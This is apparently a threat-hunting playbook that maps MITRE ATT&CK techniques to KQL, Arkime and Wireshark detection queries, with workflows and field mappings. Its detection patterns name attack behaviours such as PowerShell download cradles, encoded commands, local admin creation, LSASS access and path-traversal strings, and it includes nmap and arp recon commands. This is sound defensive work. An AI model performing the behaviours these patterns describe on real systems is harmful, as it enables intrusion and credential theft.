Start Here
Use this portable playbook as a field reference: pick a hunt path, confirm you have the required telemetry, run the relevant queries, then pivot with the checklist inside each card.

1. Pick the question

Start with the scenario, not the tool. If you know the behavior, use Hunt Workflows. If you know the technique, use the ATT&CK tactic list.

2. Check telemetry first

Every card now adds a data-source badge so you can tell if the hunt needs Windows logs, Sysmon/EDR, DNS, proxy, packet capture, Suricata, dashboards, or host access.

Windows/SysmonElastic/KibanaNetwork/PCAPSuricataPowerShell host access

3. Read the signal badges

Use Signal, Confidence, and Noise to decide what to run first. High signal and low noise cards are better triage starters; high noise cards usually need baselining.

4. Pivot with the checklist

Each card gets an investigation checklist. The checklist does not replace your process, but it gives the next pivots: user, host, parent process, source IP, destination, time window, and related tactics.

Recommended flow

  • Use Search for a T-code, process name, event ID, protocol, or tool name.
  • Use filters to hide everything except the tool you can run right now.
  • Open the matching card, run the most specific query first, then broaden only if needed.
  • Use Dashboards / IDS Rules when you need visual triage or Suricata coverage.
  • Use PowerShell Tools for host-side collection or validation after scope is approved.
Portable Playbook v1.5 - Updated 2026-04-25. Single-file HTML, offline-ready. Added Coverage Matrix, Field Mapping, refreshed hunt-card counts, panel collapse/expand/copy controls, improved search results, required telemetry, tuning notes, priority badges, safer incident-note warning, readable code blocks, wrap toggle, and mobile layout cleanup.
Pinned Hunts
Cards you pin are saved locally in this browser. Use this as a quick working set for a hunt, tabletop, or training session.
Coverage Matrix
At-a-glance coverage by ATT&CK tactic and tool type. Counts are generated from the cards in this file when it opens, so the matrix stays aligned as the playbook grows.
TacticHunt CardsKQLArkimeWiresharkSuricataPowerShellCloud
Loading coverage...
Field Mapping / Data Model
Use this as a translation aid when moving a hunt between Elastic ECS, Winlogbeat, raw Sysmon, EDR, and network data. Always validate against the fields your local parser actually writes.
ConceptElastic ECSWinlogbeat / WindowsSysmon RawNotes
Process nameprocess.nameprocess.name or parser-specific fieldImageNormalize paths before comparing process names.
Command lineprocess.command_linewinlog.event_data.CommandLineCommandLineRequires command-line logging or EDR process telemetry.
Parent processprocess.parent.namewinlog.event_data.ParentProcessNameParentImageCritical for execution, LOLBin, and script abuse hunts.
Event IDevent.codewinlog.event_idEventIDSome pipelines store this as a string, some as a number.
Useruser.namewinlog.event_data.SubjectUserName / TargetUserNameUserTrack both actor and target account when available.
Hosthost.namewinlog.computer_nameComputerNormalize FQDN, short name, and asset inventory names.
Source IPsource.ipwinlog.event_data.IpAddressSourceIpAuthentication logs may use workstation name instead of IP.
Destination IP / portdestination.ip, destination.portVaries by log sourceDestinationIp, DestinationPortNeeded for network, lateral movement, and C2 pivots.
File pathfile.pathwinlog.event_data.TargetFilenameTargetFilenamePreserve original case for analyst review; compare normalized path for rules.
Registry pathregistry.pathwinlog.event_data.TargetObjectTargetObjectCommon in persistence and defense-evasion detections.
DNS querydns.question.nameDNS client/server log fields varyQueryNameConfirm whether you ingest endpoint DNS, resolver DNS, or both.
URL / domainurl.full, url.domainProxy-specific fieldsNot usually SysmonProxy, firewall, and EDR schemas differ heavily.
Hashfile.hash.sha256, process.hash.sha256winlog.event_data.HashesHashesPrefer SHA256 where available; parse multi-hash strings carefully.
Cloud actoruser.name, cloud.account.idN/AN/ACloudTrail, Azure AD, and M365 use different identity object names.

Analyst note: this page is intentionally a mapping aid, not a schema guarantee. Before operationalizing a card, confirm exact field names, data type, parser version, and retention window in your SIEM.

Placeholder Legend
Common placeholders used inside the playbook queries. Replace these with approved values from your environment before running or sharing a query.
PlaceholderReplace with
<MP IPs>Mission partner/internal IP ranges.
<legit MP accounts>Approved admin/service accounts.
<target range>Approved CIDR/range.
<baseline>Known-good values from your environment.
<admin hosts>Jump boxes, management servers, SOC-approved hosts.

Analyst note: do not run placeholder values literally. Confirm scope, authorization, and local field names before using the query in a production SIEM or packet tool.

Incident Notes
Local-only working notes for whoever opens this file. Notes are auto-saved in the browser and can be exported as a text file.
Handling warning: Do not store classified information, credentials, PII, customer-sensitive data, or restricted case details in local notes. Export approved notes and clear this page after use.
Notes are stored only in this browser.
MITRE ATT&CK Threat Hunting Playbook
Created by Justin McGee Threat Hunting | Detection Engineering | MITRE ATT&CK justin-mcgee
This playbook provides detection logic, hunting queries, field workflows, and adversary context based on the MITRE ATT&CK Enterprise Framework. Start with the guide pages, search for a T-code/process/event ID, or open a tactic tile below. Tool filters live inside the Tactics tab so they only appear where they apply.

Initial Access

TA0001

Techniques to gain a foothold into your network โ€” phishing, exploiting public apps, valid accounts, removable media.

14 hunt cards

Execution

TA0002

Techniques for running malicious code โ€” PowerShell, WMI, scheduled tasks, scripting interpreters.

23 hunt cards

Persistence

TA0003

Maintaining foothold across reboots โ€” registry run keys, scheduled tasks, web shells, BITS jobs.

26 hunt cards

Privilege Escalation

TA0004

Gaining higher-level permissions โ€” UAC bypass, process injection, AppInit DLLs, shortcut modification.

14 hunt cards

Defense Evasion

TA0005

Avoiding detection โ€” obfuscation, log clearing, masquerading, disabling security tools, rundll32.

53 hunt cards

Credential Access

TA0006

Stealing credentials โ€” LSASS dumping, NTDS, brute force, credential stuffing, password stores.

19 hunt cards

Discovery

TA0007

Mapping the environment โ€” network scanning, account enumeration, system info, share discovery.

36 hunt cards

Lateral Movement

TA0008

Moving through the network โ€” RDP, SSH, WMI, pass-the-hash, internal spearphishing.

12 hunt cards

Collection

TA0009

Gathering data โ€” email collection, screen capture, clipboard, staged data, archive utilities.

22 hunt cards

Command & Control

TA0011

C2 communication โ€” DNS tunneling, protocol tunneling, encrypted channels, web services.

26 hunt cards

Exfiltration

TA0010

Stealing data out โ€” over C2 channel, alternative protocols, USB exfiltration.

9 hunt cards

Impact

TA0040

Disruption and destruction โ€” denial of service, system shutdown, data destruction.

14 hunt cards
Quick Hunt Workflows
Scenario-first paths for common investigations. These buttons jump into the existing technique cards without changing any of the detection logic.

Initial Compromise Hunt

Use when the first lead is a suspicious login, phishing report, web exploit, or unknown first host.

  1. Check account abuse and phishing indicators.
  2. Pivot to execution and payload transfer.
  3. Review supporting dashboards or IDS hits.

PowerShell Abuse Hunt

Use when you see encoded commands, download cradles, unusual parents, remoting, or suspicious script block logs.

  1. Start with PowerShell execution.
  2. Pivot to WMI, scheduled tasking, and evasion.
  3. Use host tools only after scope is approved.

Credential Theft Hunt

Use when there are LSASS access alerts, NTDS activity, password spraying, suspicious auth, or possible keylogging.

  1. Start with dumping and brute force.
  2. Check password stores and unsecured credentials.
  3. Pivot into lateral movement if credentials were used.

Lateral Movement Hunt

Use when one host touches many internal systems, admin shares, remote services, SMB, WinRM, RDP, or PsExec-like behavior.

  1. Identify source host, target host, and account.
  2. Check remote services and tool transfer.
  3. Confirm whether credentials were newly used elsewhere.

Exfiltration Hunt

Use when there are unusual outbound volumes, archive staging, suspicious HTTP POSTs, cloud uploads, or C2-adjacent transfer.

  1. Check archive/staging behavior.
  2. Pivot to protocol and web service exfiltration.
  3. Correlate endpoint, proxy, DNS, and IDS views.

Ransomware / Impact Hunt

Use when there is encryption, mass file modification, backup tampering, service stopping, shutdown behavior, or destructive actions.

  1. Check impact behavior first.
  2. Pivot to defense evasion and recovery inhibition.
  3. Review account and lateral movement scope.
Search Results
Initial Access TA0001
Adversaries use Initial Access techniques to gain a foothold in your network. This includes spearphishing, exploiting public-facing web servers, and using valid accounts obtained through credential theft or purchase.
T1078

Valid Accounts

[MITRE]

Why they do it: Adversaries obtain and abuse credentials of existing accounts (local, domain, or cloud). This is highly stealthy because it blends in with legitimate user activity, bypassing access controls without exploiting vulnerabilities.

What to look for: Logins outside of normal business hours, disabled/dormant accounts suddenly authenticating, multiple concurrent logins from the same user, or logins failing MFA prompts repeatedly.

Key Event IDs: 4624 (Successful Logon) โ€” review logon type codes. 4625 (Failed Logon). 4648 (Logon using explicit creds / RunAs). 4672 (Admin logon). 4720 (Account created). 4778/4779 (RDP session reconnect/disconnect).

KQLRun ELK MLA anomaly jobs for rare user/login activity
windows_rare_user_runas_event
endpoint_suspicious_login_activity
endpoint_rare_user_type10_remote_login
KQLDetect access using valid accounts โ€” key event IDs
event.code: (4624 OR 4625 OR 4648 OR 4672 OR 4720 OR 4724 OR 4776 OR 4778 OR 4779 OR 4798 OR 4799)
KQLDormant/default privileged accounts logging in over network
winlog.event_id: 4624 AND winlog.logon.type: 3 AND user.name: ("Administrator" OR "Guest" OR "DefaultAccount" OR "krbtgt") AND NOT source.ip: ("10.0.0.0/8" OR "192.168.0.0/16")
InfoAlso check Persistence, Privilege Escalation, and Defense Evasion for this technique. xfreerdp tool commonly observed.
xfreerdp
See also: T1078.003 (Local Accounts), T1078.004 (Cloud Accounts)
T1078.003

Valid Accounts: Local Accounts

[MITRE]

Why they do it: Adversaries use local accounts (not domain accounts) to authenticate, often avoiding domain-level monitoring and logging.

KQLDetect local account creation with admin privileges
"net user" AND "add"   -- followed by:
"net localgroup" AND "admin"
KQLLocal account creation via command line or event code
event.code: 4720 OR process.command_line: ("new-localuser" OR ("net user" AND "\/add"))
PowerShellEnumerate all local accounts and verify they are valid
Get-LocalUser
T1133

External Remote Services

[MITRE]

Why they do it: Adversaries leverage external-facing remote services (VPNs, RDP, SSH, Citrix, OWA) to connect to the internal network using stolen or brute-forced credentials. This blends in with legitimate remote work.

What to look for: Logins during unusual hours/days, unusual source IPs, multiple failed attempts followed by success. Also see Persistence.

ArkimeReview VPN, SSH, RDP, OWA, Citrix traffic โ€” especially during unusual hours
VPN:  port == [443, 1194, 51820, 500, 4500, 1701] || protocol == [openvpn, ipsec, l2tp, sstp, pptp, ssl, tls]
SSH:  port == 22 || protocols == ssh
RDP:  port == 3389 || protocol == rdp
WinRM: port == 5985
KQLSuccessful RDP/SSH from external IPs
event.category: "authentication" AND event.outcome: "success" AND destination.port: (3389 OR 22) AND NOT source.ip: ("10.0.0.0/8" OR "192.168.0.0/16" OR "172.16.0.0/12")
KQLUnusual DNS activity related to remote services
event.code: (2 OR 23 OR 26) AND (process.name: *dns* OR process.executable: "\\dns*")
KQLWinRM connections with abnormal credentials
process.name: wsmprovhosts.exe AND NOT related.user: (<legit MP accounts>)
*winrm* AND NOT process.name: wsmprovhost.exe
T1190

Exploit Public-Facing Application

[MITRE]

Why they do it: To gain a foothold by exploiting weaknesses in software accessible from the internet (Web Servers, Firewalls, VPN gateways, Exchange Servers).

What to look for: Web server processes spawning shells, excessive HTTP 500 errors, known exploit payloads (Log4j JNDI, SQLi, path traversal) in URI requests or headers.

KQLWeb server daemons spawning shells (RCE indicator)
process.parent.name: ("w3wp.exe" OR "httpd.exe" OR "nginx.exe" OR "php.exe" OR "php-cgi.exe" OR "tomcat.exe") AND process.name: ("cmd.exe" OR "cscript.exe" OR "powershell.exe" OR "pwsh.exe" OR "powershell_ise.exe" OR "wmic.exe" OR "wscript.exe")
KQLPath traversal or SQL injection in web access logs
url.original: (*..%2f* OR *%2e%2e%2f* OR *etc/passwd* OR *UNION+SELECT*) OR http.response.status_code: 500
KQLReview RDP traffic indicators
event.code: (4624 OR 4634 OR 4647 OR 4778)
-- AND look for: net conns from mstsc.exe, rdpclip.exe, logon type 10
KQLExchange CVE-2021-26858 โ€” suspicious file writes by UM service
event.type: "creation" AND process.name: ("UMWorkerProcess.exe" OR "umservice.exe") AND file.extension: ("php" OR "jsp" OR "js" OR "aspx" OR "asmx" OR "asax" OR "cfm" OR "shtml")
KQLRDP from internet to internal IPs (should almost never happen)
event.category: (network or network_traffic) AND network.transport: tcp AND (destination.port: 3389 OR event.dataset: zeek.rdp) AND NOT source.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16) AND destination.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
KQLCommands executed via web server process (web shell indicator)
event.code: 1 AND process.parent.executable: (*\\wsmprovhost.exe) AND process.executable: (*\\cmd.exe OR *\\sh.exe OR *\\bash.exe OR *\\powershell.exe OR *\\pwsh.exe OR *\\wsl.exe OR *\\schtasks.exe OR *\\certutil.exe OR *\\whoami.exe OR *\\bitsadmin.exe)
ArkimeSearch for VPN/Citrix exploit traffic patterns
protocols == http AND http.uri == [*vpn*, *smb.conf*, *.xml*, *.pl*]
url.path: (*vpns* OR *smb.conf* OR *vpn* OR *.xml* OR *.pl*)
T1200

Hardware Additions

[MITRE]

Why they do it: Adversaries with physical access introduce rogue hardware (USB Rubber Duckies, network taps, rogue APs) to bypass perimeter defenses.

KQLNew external device recognized by system โ€” verify if legitimate
event.code: 6416   -- New external device recognized
event.code: 6421   -- Request to enable a device
event.code: 6422   -- Device enabled
event.code: 6423   -- Device installation forbidden by policy
InfoLeverage nmap/Nessus network scan and compare against baseline or MP-provided device list. Run arp -a (may need elevated privileges). If MP uses SolarWinds, request device discovery results for comparison.
arp -a
nmap -sn <network range>
-- Compare against authorized device list from mission partner
T1566

Phishing

[MITRE]

Why they do it: To trick users into executing malicious attachments, clicking links, or providing credentials. Bypasses technical perimeter controls by exploiting human trust.

What to look for: Office apps spawning child processes (macros), emails with dangerous attachment extensions, network traffic to new domains after email activity.

KQLMalicious process spawned from Outlook โ€” broad detection
event.action: "Process Create (rule: ProcessCreate)" AND process.parent.name: outlook.exe AND process.name: (Microsoft.Workflow.Compiler.exe OR arp.exe OR atbroker.exe OR bitsadmin.exe OR certutil.exe OR cmd.exe OR cscript.exe OR mshta.exe OR net.exe OR net1.exe OR netsh.exe OR nltest.exe OR ping.exe OR powershell.exe OR pwsh.exe OR reg.exe OR regsvr32.exe OR sc.exe OR schtasks.exe OR systeminfo.exe OR tasklist.exe OR whoami.exe OR wmic.exe OR wscript.exe)
KQLOffice/PDF spawning suspicious child processes
process.parent.name: ("WINWORD.EXE" OR "EXCEL.EXE" OR "POWERPNT.EXE" OR "OUTLOOK.EXE" OR "AcroRd32.exe" OR "FoxitReader.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe" OR "cscript.exe" OR "mshta.exe" OR "rundll32.exe")
KQLSuspicious process from Outlook
event.category: process AND event.type: start AND process.parent.name: "outlook.exe"
KQLPDF reader writing then executing an EXE
event.type != "deletion" AND file.extension: "exe" AND process.name: ("AcroRd32.exe" OR "rdrcef.exe" OR "FoxitPhantomPDF.exe" OR "FoxitReader.exe") AND NOT file.name: ("FoxitPhantomPDF.exe" OR "FoxitReader.exe" OR "AcroRd32.exe" OR "rdrcef.exe")
ArkimeInbound email traffic containing attachments from external sources
ip.src == <NOT MP IPs> AND ip.dst == <MP IPs> AND (protocols == smtp OR port == 25)
email.fn == EXISTS!
T1566.001

Phishing: Spearphishing Attachment

[MITRE]

What to look for: Emails with suspicious attachment file types, macro-enabled documents, Office Add-Ins loaded from temp/downloads folders.

ArkimeQuery for emails with files attached โ€” review for suspicious attachments
email.fn == EXISTS!
KQLURL file access not from Explorer (possible LNK phishing)
event.code: 4663 AND file.extension: "url" AND NOT process.name: "explorer.exe"
KQLOffice products writing suspicious file extensions
process.parent.name: (WINWORD.EXE OR EXCEL.EXE OR POWERPNT.EXE OR mspub.exe OR fltldr.exe OR visio.exe) AND file.extension: (exe OR pif OR scr OR iso OR rar OR 7z OR img OR vhd OR js OR vbs OR wsh OR hta OR cpl OR jse OR vbe OR cmd OR dll)
KQLUser clicking macro-enabled phishing attachment โ€” PowerShell downloading payload
powershell AND "Invoke-WebRequest" AND "-OutFile"
KQLHigh entropy HTML file written to Downloads/Temp (HTML smuggling)
event.action in ("creation", "rename") AND file.extension: ("htm", "html") AND file.path: ("?:\\Users\\*\\Downloads\\*" OR "?:\\Users\\*\\Content.Outlook\\*" OR "?:\\Users\\*\\AppData\\Local\\Temp\\*") AND ((file.Ext.entropy >= 5 AND file.size >= 150000) OR file.size >= 1000000)
KQLPowerShell launched by wscript/cscript (script in Office doc)
event.type: "start" AND process.parent.name: ("cscript.exe", "wscript.exe") AND process.name: "powershell.exe"
KQLCHM file (compiled HTML) used as phishing attachment
".chm"
process.name: "hh.exe" AND NOT destination.ip: (<MP IPs>) AND NOT dns.question.name: "localhost"
T1566.002

Phishing: Spearphishing Link

[MITRE]

What to look for: Browsers opening HTML files from temp/downloads folders with high entropy, browsers spawned by Outlook, clicks leading to immediate file downloads.

KQLBrowser opening high-entropy HTML from temp/downloads (HTML smuggling)
event.action in ("creation", "rename") AND file.extension: ("htm", "html") AND file.path: ("?:\\Users\\*\\Downloads\\*" OR "?:\\Users\\*\\Content.Outlook\\*" OR "?:\\Users\\*\\AppData\\Local\\Temp\\*") AND ((file.Ext.entropy >= 5 AND file.size >= 150000) OR file.size >= 1000000)
KQLBrowser spawned by Outlook โ€” link click indicator
process.name: (iexplore.exe OR msedge.exe OR chrome.exe OR firefox.exe) AND process.command_line: *http* AND process.parent.name: OUTLOOK.EXE
KQLBrowser opening HTML file from temp/downloads (single-arg = suspicious)
event.action: "start" AND process.name: (chrome.exe OR msedge.exe OR brave.exe OR firefox.exe OR iexplore.exe) AND process.args: ("?:\\Users\\*\\Downloads\\*.htm*" OR "?:\\Users\\*\\Content.Outlook\\*.htm*" OR "?:\\Users\\*\\AppData\\Local\\Temp\\*.htm*")
T1091

Replication Through Removable Media

[MITRE]

Why they do it: Adversaries copy malware to removable media and rely on users to plug it into other systems โ€” frequently used to bridge air-gapped networks.

KQLFile access on removable storage
event.code: 4663 AND "removable storage"
event.code: 4688 AND NOT new.process.name: <normal drive>:*
T1659

Content Injection

[MITRE]

Why they do it: Adversaries inject malicious code into legitimate websites, advertising networks, or CDNs that targeted users visit, allowing code to execute via trusted sources.

KQLDNS queries to suspicious CDN/malvertising domains
event.dataset: "network_traffic" AND dns.question.name: (*suspicious-cdn* OR *malvertising* OR *adserver*) AND NOT dns.question.name: (*google* OR *akamai*)
ArkimeHidden iframes in HTTP responses (unencrypted traffic only)
http.response.body contains "<iframe src=" AND (http.response.body contains "hidden" OR http.response.body contains "width=0" OR http.response.body contains "display:none")
T1189

Drive-by Compromise

[MITRE]

Why they do it: Also known as "Watering Hole" attack โ€” adversaries compromise a legitimate website targeting a specific group. Merely browsing executes an exploit against the user's browser.

KQLWeb browsers spawning command-line tools or scripting engines
process.parent.name: ("chrome.exe" OR "msedge.exe" OR "firefox.exe" OR "iexplore.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe" OR "cscript.exe" OR "certutil.exe" OR "mshta.exe")
KQLBrowsers making outbound connections on non-standard ports
winlog.event_id: 3 AND process.name: ("chrome.exe" OR "msedge.exe") AND NOT destination.port: (80 OR 443 OR 8080)
ArkimeSuspicious redirects or Exploit Kit traffic patterns
http.response.code == 302 AND http.location contains "http://" AND http.location matches "[a-zA-Z0-9]{15,}\.(info|xyz|top)"
T1195

Supply Chain Compromise

[MITRE]

Why they do it: Adversaries manipulate a third-party product prior to delivery. When the org installs the trusted update (e.g., SolarWinds), they unwittingly install malware. Detected behaviorally post-compromise.

KQLTrusted vendor applications spawning shells anomalously
process.parent.name: ("SolarWinds.BusinessLayerHost.exe" OR "kaseya.exe" OR "TaniumClient.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "whoami.exe")
KQLTrusted servers making abnormal DNS requests (C2 beacon indicator)
event.dataset: "dns" AND dns.question.name: * AND source.ip: "10.0.x.x" /* IP of Trusted Management Server */
T1199

Trusted Relationship

[MITRE]

Why they do it: Adversaries breach a third-party partner or MSP that has an authorized connection into the target org, bypassing the primary perimeter.

KQLAdministrative logins from partner IP ranges during off-hours
source.ip: "198.51.100.0/24" /* Example MSP IP Range */ AND event.category: "authentication" AND event.outcome: "success" AND (user.name: "*admin*" OR user.name: "*svc*")
ArkimeLarge unexpected data transfers over B2B VPN tunnels
ip.src == [Trusted_Partner_IP] AND tcp.len > 10000000  /* flows larger than 10MB */
T1669

Wi-Fi Networks

[MITRE]

Why they do it: Adversaries exploit Wi-Fi to gain access from the parking lot โ€” cracking WPA keys, setting up Evil Twin APs, or exploiting Wi-Fi infrastructure vulnerabilities.

KQLWLAN AutoConfig failed connections to corporate SSID
winlog.channel: "Microsoft-Windows-WLAN-AutoConfig/Operational" AND winlog.event_id: 8002
WiresharkDeauthentication frames โ€” used to force disconnect and redirect to rogue AP
wlan.fc.type_subtype == 0x0c OR wlan.fc.type_subtype == 0x0a
Execution TA0002
Techniques that result in adversary-controlled code running on a local or remote system. Often paired with other tactics to achieve broader goals like exploration or data theft.
T1059

Command and Scripting Interpreter

[MITRE]

Why they do it: Adversaries abuse built-in interpreters (PowerShell, cmd, Bash, Python, VBScript) to run arbitrary commands โ€” "Living off the Land" avoids dropping custom malware.

KQLmstsc.exe used by Cobalt Strike for command execution
mstsc.exe
KQLPowerShell executing remote commands or IEX
process.name: powershell.exe AND process.command_line: (*Start-Process* OR *Invoke-Command* OR *IEX*)
T1059.001

Command and Scripting: PowerShell

[MITRE]

What to look for: Obfuscated command lines, encoded commands, download cradles, non-interactive execution, PowerShell remoting.

KQLPowerShell script block logging โ€” events 4103/4104
event.code: (4104 OR 4103)
KQLEncoded/hidden PowerShell commands (obfuscation)
process.name: ("powershell.exe" OR "pwsh.exe") AND process.command_line: (*-enc* OR *-EncodedCommand* OR *-w hidden* OR *DownloadString* OR *-ExecutionPolicy Bypass*)
KQLPowerShell not spawned by Explorer (unusual parent)
event.code: (10 OR 4688) AND process.name: powershell.exe AND NOT process.parent.name: explorer.exe
KQLPowerShell remoting / WinRM execution
winlog.task: "Execute a Remote Command"
"Enable-PSRemoting"
winrm AND "Invoke-Command*"
process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND winlog.event_data.Payload: *
KQLPowerShell process start events (baseline / broad)
(event.type: "process_start" AND process.name: "powershell.exe") OR (event.type: "process_start" AND process.name: "pwsh.exe") OR (event.type: "process_start" AND process.name: "powershell_ise.exe")
KQLPowerShell IEX (Invoke-Expression) โ€” common download and execute
powershell AND iex
T1059.003

Command and Scripting: Windows Command Shell

[MITRE]
KQLCMD.exe process activity
process.name: cmd.exe
KQLCMD with redirected output (common in lateral movement / C2)
event.code: 1 AND process.command_line: (*cmd.exe\ \/Q\ \/c\ *\ 1\ \\\\*\\*\\*\ 2\&1 OR *cmd.exe\ \/C\ *\ \ \\\\*\\*\\*\ 2\&1)
KQLCMD with curl (download indicator)
event.code: 1 AND process.command_line: *curl*
T1059.005

Command and Scripting: Visual Basic

[MITRE]
KQLVBScript interpreters running
process.name: (cscript.exe OR wscript.exe)
process.parent.name: (winword.exe OR powerpnt.exe OR excel.exe OR onenote.exe)
event.type: creation AND event.category: file AND file.name: *vbscript.dll*
T1059.006

Command and Scripting: Python

[MITRE]
KQLPython interpreter execution on Windows
(event.type: "process_start" AND process.name: "python.exe") OR (event.type: "process_start" AND process.name: "python3.exe")
T1047

Windows Management Instrumentation (WMI)

[MITRE]

Why they do it: WMI allows remote execution, persistence, and reconnaissance. Adversaries abuse it because WMI activity is not blocked by most security tools and appears legitimate.

KQLNative enumeration commands spawned by WMI (wmiprvse.exe parent)
event.type: "start" AND process.command_line: * AND process.name: ("arp.exe" OR "dsquery.exe" OR "gpresult.exe" OR "hostname.exe" OR "ipconfig.exe" OR "nbtstat.exe" OR "net.exe" OR "netsh.exe" OR "netstat.exe" OR "nltest.exe" OR "ping.exe" OR "quser.exe" OR "qwinsta.exe" OR "reg.exe" OR "sc.exe" OR "systeminfo.exe" OR "tasklist.exe" OR "whoami.exe") AND process.parent.name: "wmiprvse.exe"
KQLSuspicious cmd.exe execution via WMI
event.type: "start" AND process.parent.name: "WmiPrvSE.exe" AND process.name: "cmd.exe"
KQLWMI-related process names
process.name: ("wmic.exe" OR "powershell.exe" OR "wbemtool.exe" OR "wmiprvse.exe" OR "wmiadp.exe" OR "scrcons.exe")
process.command_line: (wmic OR get-wmi* OR get-cim*)
KQLWMI-related event IDs
event.code: (4688 OR 4656 OR 4103 OR 800)
-- WMI specific:
event.code: (5861 OR 5857 OR 5858)
  5861: WMI query execution failures
  5857: File failed policy enforcement check
  5858: Changes to WMI filters
T1053

Scheduled Task/Job

[MITRE]

Why they do it: Adversaries abuse task scheduling to execute code at a specific time, recurring schedule, or at startup. Also used for Persistence.

KQLScheduled task creation, modification, deletion โ€” key event IDs
event.code: (4698 OR 4699 OR 4700 OR 4701 OR 4702 OR 106 OR 140 OR 141)
  4698: Task created  |  4699: Task deleted  |  4700: Task enabled
  4701: Task disabled  |  4702: Task updated
KQLschtasks.exe creating tasks
process.name: schtasks.exe AND process.args: /create
process.name: ("schtasks.exe" OR "at.exe" OR "Taskeng.exe")
KQLScheduled task pointing to PowerShell or CMD (suspicious)
event.code: 4698 AND NOT (Reboot OR Defrag) AND process.name: (powershell.exe OR cmd.exe)
KQLTask creation via command line pointing to temp/appdata
(process.name: "schtasks.exe" AND process.command_line: "* /create *" AND process.command_line: ("*AppData*" OR "*Temp*" OR "*ProgramData*")) OR winlog.event_id: 4698
KQLT1053.005 Scheduled Task โ€” TaskScheduler.exe with create/change/delete args
(event.type: "process_start" AND process.name: "TaskScheduler.exe") AND (process.command_line: "* /Create *" OR process.command_line: "* /Change *" OR process.command_line: "* /Delete *")
T1106

Native API

[MITRE]

Why they do it: Instead of command-line tools (heavily monitored), adversaries write malware that calls OS Native APIs directly (e.g., CreateProcess, VirtualAlloc) to execute payloads stealthily.

KQLSuspicious process access to LSASS or Explorer (injection indicator)
winlog.event_id: 10 AND winlog.event_data.TargetImage: ("*lsass.exe" OR "*explorer.exe") AND winlog.event_data.GrantedAccess: ("0x1FFFFF" OR "0x1438")
KQLNative API abuse via common proxy executables
(event.code: 4688 OR event.code: 4689) AND process.name: ("*\\rundll32.exe" OR "*\\regsvr32.exe" OR "*\\mshta.exe" OR "*\\cscript.exe" OR "*\\wscript.exe" OR "*\\powershell.exe" OR "*\\cmd.exe")
T1204

User Execution

[MITRE]

Why they do it: Adversaries rely on the user to take action (clicking a link, opening a payload, enabling macros). Includes CHM files (.chm) loaded by hh.exe.

KQLCHM files loaded by HTML Help (hh.exe) โ€” suspicious delivery
process.name: "hh.exe" AND NOT destination.ip: (<MP IPs>) AND NOT dns.question.name: "localhost"
event.type: "start" AND process.parent.name: "hh.exe" AND process.name: ("mshta.exe" OR "cmd.exe" OR "powershell.exe" OR "cscript.exe" OR "wscript.exe")
KQLT1204.002 Malicious File โ€” downloads from browser rule
rule.name: "Downloads" AND process.name: <browser exe> AND file.name: *
KQLOffice macro security settings tampered via registry (enables macros for persistence)
event.type: "change" AND registry.path: ("HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\AccessVBOM" OR "HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\VbaWarnings") AND registry.data.strings: "0x00000001" AND process.name: ("cscript.exe" OR "wscript.exe" OR "mshta.exe" OR "winword.exe" OR "excel.exe")
T1559.002

Dynamic Data Exchange (DDE)

[MITRE]

Why they do it: DDE allows applications to share data and can be abused in Office documents to execute commands without macros.

KQLDDE abuse indicators โ€” cmd launching calc, winword with -nop download, PowerShell from Word
(process.command_line: (*cmd.exe* AND *calc.exe*)) OR (process.command_line: (*winword.exe* AND *-nop* AND *download*)) OR (process.name: powershell.exe AND process.parent.name: winword.exe)
T1569

System Services

[MITRE]

Why they do it: Adversaries abuse the Service Control Manager (sc.exe) or Linux systemd to execute malicious commands, often with SYSTEM privileges.

KQLNew service created via command line โ€” binPath suspicious
(process.name: "sc.exe" AND process.command_line: "* create *" AND process.command_line: "* binPath= *") OR (winlog.event_id: 7045 AND NOT winlog.event_data.ServiceFileName: "*Program Files*")
KQLProcesses spawned by services.exe or svchost.exe (service execution)
(event.type: "process_start" AND process.parent.name: "services.exe") OR (event.type: "process_start" AND process.parent.name: "svchost.exe")
ArkimeRemote service creation via SMB/DCE-RPC (PsExec-style)
tcp.port == 445 AND dcerpc.endpoint == "svcctl"
T1053.005

Scheduled Task/Job: Scheduled Task

[MITRE]
Adversaries use Windows Task Scheduler (schtasks.exe) to execute commands or programs at specified intervals. Commonly used to establish persistence and execute payloads at login or system startup.
KQLschtasks.exe execution โ€” inspect parent process, working directory, and user context
process.name: schtasks.exe
-- Check: parent process, working dir, output redirection, user context, agent.hostname
KQLTaskScheduler process with create/change/delete args
event.type: "process_start" AND process.name: "TaskScheduler.exe" AND process.command_line: (* /Create * OR * /Change * OR * /Delete *)
T1204.002

User Execution: Malicious File

[MITRE]
Adversaries rely on users opening malicious files (documents, executables, scripts) to execute code. Files are typically delivered via phishing. Monitor for newly downloaded files being opened by users.
KQLBrowser download rule โ€” newly downloaded files opened by user
rule.name: "Downloads" AND process.name: (chrome.exe OR firefox.exe OR msedge.exe OR iexplore.exe) AND file.name: *
T1651

Cloud Administration Command

[MITRE]
Adversaries abuse cloud management interfaces (AWS SSM RunCommand, Azure RunCommand) to execute code on VMs directly from the cloud control plane, bypassing traditional network access controls like RDP/SSH.
KQLCloud API โ€” RunCommand invocations from unusual IAM users
event.dataset: ("aws.cloudtrail" OR "azure.activitylogs") AND event.action: ("RunCommand" OR "SendCommand" OR "runCommand")
KQLSysmon โ€” cloud agent spawning shell on local host
process.parent.name: ("amazon-ssm-agent.exe" OR "WaAppAgent.exe") AND process.name: ("cmd.exe" OR "powershell.exe")
T1609

Container Administration Command

[MITRE]
Adversaries abuse container administration APIs (kubectl exec, docker exec) to run commands inside existing legitimate containers, enabling pivoting, secret theft, or malware installation within the cluster.
KQLK8s Audit โ€” exec/attach to pods
kubernetes.audit.verb: "create" AND kubernetes.audit.objectRef.subresource: ("exec" OR "attach")
ArkimeTraffic to K8s API server from non-admin subnets
tcp.port == 6443 AND NOT ip.src == 10.0.0.0/8
T1610

Deploy Container

[MITRE]
Adversaries deploy entirely new malicious containers into an environment (Docker, K8s, Cloud) to execute code โ€” frequently used by cryptomining groups or to deploy proxy infrastructure.
KQLK8s Audit โ€” pods created from unapproved image registries
